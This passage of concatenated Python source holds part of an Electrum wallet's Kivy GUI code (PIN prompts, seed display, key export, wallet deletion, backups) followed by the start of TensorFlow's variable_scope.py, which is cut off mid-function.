self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
self.pincode_dialog(
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
            except Exception:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def password_dialog(self, **kwargs):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, **kwargs)
self._password_dialog.open()
def pincode_dialog(self, **kwargs):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
self._pincode_dialog.init(self, **kwargs)
self._pincode_dialog.open()
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
self.password_dialog(
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password=self.wallet.has_password())
def change_pin_code(self, cb):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
self._pincode_dialog.init(
self, check_password=self.check_pin_code,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
self._pincode_dialog.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
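# Illustrative sketch (not part of the original module): for a variable of full
# shape [10, 20] partitioned along dimension 1, the shard covering columns 5..9
# would be described by
#   info = _PartitionInfo(full_shape=[10, 20], var_offset=[0, 5])
#   info.single_slice_dim([10, 5])  # -> 1, the only dimension that differs
#   info.single_offset([10, 5])     # -> 5, this shard's offset along that dimension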
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
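# Illustrative sketch (not part of the original module), assuming the usual
# tf.compat.v1 export names: after opting in, get_variable returns resource
# variables by default.
#   import tensorflow.compat.v1 as tf
#   tf.enable_resource_variables()
#   v = tf.get_variable("v", shape=[], initializer=tf.zeros_initializer())
#   # v is now a ResourceVariable rather than a legacy RefVariable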
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(_iter_slices(
shape.as_list(),
num_slices,
slice_dim
)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
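    # Worked example of the partitioner contract documented above (illustrative):
    # for shape [20, 10], a partitioner returning [1, 2] requests two shards along
    # dimension 1, so the store creates
    #   <name>/part_0 with var_shape [20, 5] at var_offset [0, 0]
    #   <name>/part_1 with var_shape [20, 5] at var_offset [0, 5]
    # and wraps them in a single PartitionedVariable of shape [20, 10].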
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" % (err_msg, "".join(
traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
